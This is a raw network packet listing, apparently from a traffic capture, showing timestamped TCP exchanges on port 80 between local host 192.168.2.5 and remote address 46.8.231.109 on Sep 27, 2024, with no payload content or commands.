Sep 27, 2024 00:15:03.941378117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.941395044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941442966 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.941605091 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941657066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941657066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.941668987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941714048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.941714048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.941742897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941754103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941765070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941776037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.941787958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.941817999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942069054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942102909 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942114115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942127943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942157984 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942157984 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942184925 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942195892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942204952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942234993 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942265034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942315102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942325115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942336082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942346096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942388058 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942388058 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942410946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942421913 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942431927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942441940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942452908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942459106 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942481995 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942502975 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942507029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942517042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942527056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942575932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942575932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942632914 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942643881 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942652941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942675114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942684889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942712069 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942712069 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942773104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942807913 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942826033 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942851067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942861080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942893982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942920923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942933083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942975044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942985058 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.942987919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.942997932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.943031073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.943048000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.947594881 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.947606087 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.947616100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.947634935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.947669029 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.947690010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.947700977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.947712898 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.947714090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.947722912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.947731972 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.947804928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.947994947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.948035955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.948045969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.948048115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.948072910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.948107004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.948116064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.948128939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.948153973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.948153973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.948172092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.948183060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.948193073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.948194027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.948246956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.948246956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.949191093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949244022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.949245930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949255943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949317932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.949317932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.949338913 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949352026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949362040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949368954 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949377060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949384928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949409962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.949464083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.949675083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949686050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949695110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949704885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949740887 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.949740887 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.949745893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949757099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949778080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949789047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949809074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.949809074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.949831963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.949980974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.949990988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950001001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950041056 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.950041056 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.950071096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950082064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950090885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950100899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950112104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950118065 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.950156927 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.950156927 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.950212002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950264931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950265884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.950275898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950316906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.950316906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.950378895 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950388908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950400114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950408936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950413942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:03.950433016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:03.950464964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.018265009 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.018279076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.018289089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.018301010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.018346071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.018356085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.018366098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.018378019 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.018389940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.018445015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.026276112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026330948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026334047 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.026343107 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026376963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.026426077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026437998 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026448965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026459932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026470900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026492119 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.026492119 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.026520967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.026813030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026863098 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.026869059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026879072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026896954 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026907921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026916027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.026943922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.026943922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.026973009 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.026983976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.027059078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.027080059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.027091026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.027101994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.027112961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.027122974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.027137041 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.027153969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.027173042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.027175903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.027189016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.027199984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.027209044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.027231932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.027231932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.027257919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.028023958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028078079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.028098106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028107882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028120041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028131008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028157949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.028157949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.028175116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.028181076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028192043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028203011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028249979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.028249979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.028567076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028578043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028587103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028598070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028608084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028619051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028625011 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.028659105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.028659105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.028745890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028758049 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028810978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.028923035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028934956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028944969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.028976917 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.028990984 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029001951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029015064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029047012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029069901 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029081106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029092073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029103041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029114008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029122114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029143095 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029143095 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029244900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029256105 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029266119 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029278040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029289007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029299021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029304981 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029309988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029356003 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029356003 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029387951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029401064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029412031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029429913 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029463053 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029463053 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029474020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029484987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029495001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029505968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029541969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029541969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029565096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029825926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029895067 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029906988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029918909 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.029961109 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029961109 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.029998064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.030008078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.030019045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.030030012 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.030057907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.030092001 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.047924995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.047949076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.047960043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.047991037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.047991037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048049927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048064947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048088074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048126936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048135996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048136950 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048150063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048173904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048175097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048221111 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048254967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048268080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048278093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048288107 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048299074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048305035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048310041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048338890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048338890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048372984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048383951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048394918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048409939 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048409939 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048435926 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048435926 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048574924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048584938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048595905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048605919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048614979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048625946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048635960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048645020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048656940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048666954 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048675060 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048675060 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048690081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048747063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048904896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048916101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048928022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048938990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048949003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048959017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048960924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048970938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048981905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.048988104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048988104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.048993111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.049002886 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.049012899 CEST	80	49708	46.8.231.109	192.168.2.5
